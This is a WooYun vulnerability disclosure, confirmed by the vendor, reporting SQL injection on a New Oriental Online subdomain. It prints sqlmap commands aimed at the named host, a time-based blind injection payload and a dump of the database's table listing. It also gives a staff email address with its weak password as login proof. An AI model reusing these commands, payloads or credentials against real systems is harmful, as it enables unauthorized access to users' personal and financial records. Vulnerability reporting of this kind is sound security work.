当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158343

漏洞标题:新东方在线某子域名全站式注入

相关厂商:新东方

漏洞作者: hecate

提交时间:2015-12-04 19:45

修复时间:2016-01-19 00:50

公开时间:2016-01-19 00:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-05: 厂商已经确认,细节仅向厂商公开
2015-12-15: 细节向核心白帽子及相关领域专家公开
2015-12-25: 细节向普通白帽子公开
2016-01-04: 细节向实习白帽子公开
2016-01-19: 细节向公众公开

简要描述:

全站式就是到处都是注入

详细说明:

地址 http://tb.koolearn.com/ 登录框处

sqlmap -u "http://tb.koolearn.com/index/lsub?username=a&password=s&checkbox=0"


Parameter: username (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=a' AND (SELECT * FROM (SELECT(SLEEP(5)))sMNR) AND 'cOLF'='cOLF&password=s&checkbox=0
---
[23:36:47] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.5.12
back-end DBMS: MySQL 5.0.12


available databases [3]:
[*] information_schema
[*] tbl
[*] test
Database: tbl
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| tbl_transaction          | 273227  |
| tbl_remind_push          | 71005   |
| tbl_user_study           | 60076   |
| tbl_course               | 57141   |
| tbl_review               | 26566   |
| tbl_stulist              | 22945   |
| tbl_code                 | 22510   |
| tbl_study                | 14302   |
| tbl_user                 | 14280   |
| zxzbcar_push             | 12867   |
| tbl_message              | 10300   |
| tbl_classlist            | 5154    |
| tbl_user_dream           | 5105    |
| tbl_answers              | 3214    |
| tbl_title                | 3064    |
| tbl_review_unlock        | 1757    |
| tbl_class_resource       | 1750    |
| tbl_bind                 | 1112    |
| tbl_teacher_point        | 985     |
| tbl_finance              | 879     |
| tbl_english_answers      | 877     |
| tbl_english_record       | 810     |
| tbl_finance_wj           | 776     |
| tbl_upaudiofile          | 774     |
| tbl_admin_class          | 554     |
| tbl_efficiency           | 517     |
| tbl_knowledge            | 416     |
| admin_roles              | 410     |
| tbl_english_upaudiofile  | 398     |
| tbl_admin                | 380     |
| tbl_finance_drop         | 371     |
| tbl_english_title        | 272     |
| tbl_messagetext          | 245     |
| tbl_composition          | 209     |
| tbl_coin_log             | 194     |
| tbl_push                 | 142     |
| tbl_knowledge_msg        | 73      |
| tbl_advice               | 65      |
| tbl_menu                 | 65      |
| tbl_morn_read            | 52      |
| tbl_schoollist           | 50      |
| goolen3                  | 48      |
| tbl_english_scene        | 32      |
| tbl_province             | 31      |
| tbl_english_mate         | 29      |
| tbl_buffey_column_video  | 22      |
| tbl_coins                | 21      |
| tbl_buffey_column_review | 13      |
| tbl_english_resource     | 13      |
| tbl_resources            | 9       |
| tbl_buffey_column_name   | 8       |
| tbl_bind_vir             | 4       |
| tbl_roles                | 3       |
| tbl_roles_ctrl           | 3       |
| tbl_advice_reply         | 1       |
| tbl_sign                 | 1       |
| tbl_version              | 1       |
+--------------------------+---------+

漏洞证明:

大多数密码都是 123456,随便登录一个

liyuan26@xdf.cn  密码123456


2.png

靓!
存在多个注入点

sqlmap -u "http://tb.koolearn.com/teachmanage/intoclass/classid/3728*/resource_id/33201*/unit_id/166251*" --cookie="填上cookie"
参数 classid,resource_id,unit_id均可注入


injection.png

修复方案:

过滤

版权声明:转载请注明来源 hecate@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-05 00:44

厂商回复:

谢谢漏洞提供,我们会尽快处理!

最新状态:

暂无

漏洞评价:

评价

  1. 2015-12-04 20:13 | hecate ( 普通白帽子 | Rank:691 漏洞数:106 | ®高级安全工程师 | WooYun认证√)

    早知道审核好这口就多发几张美图了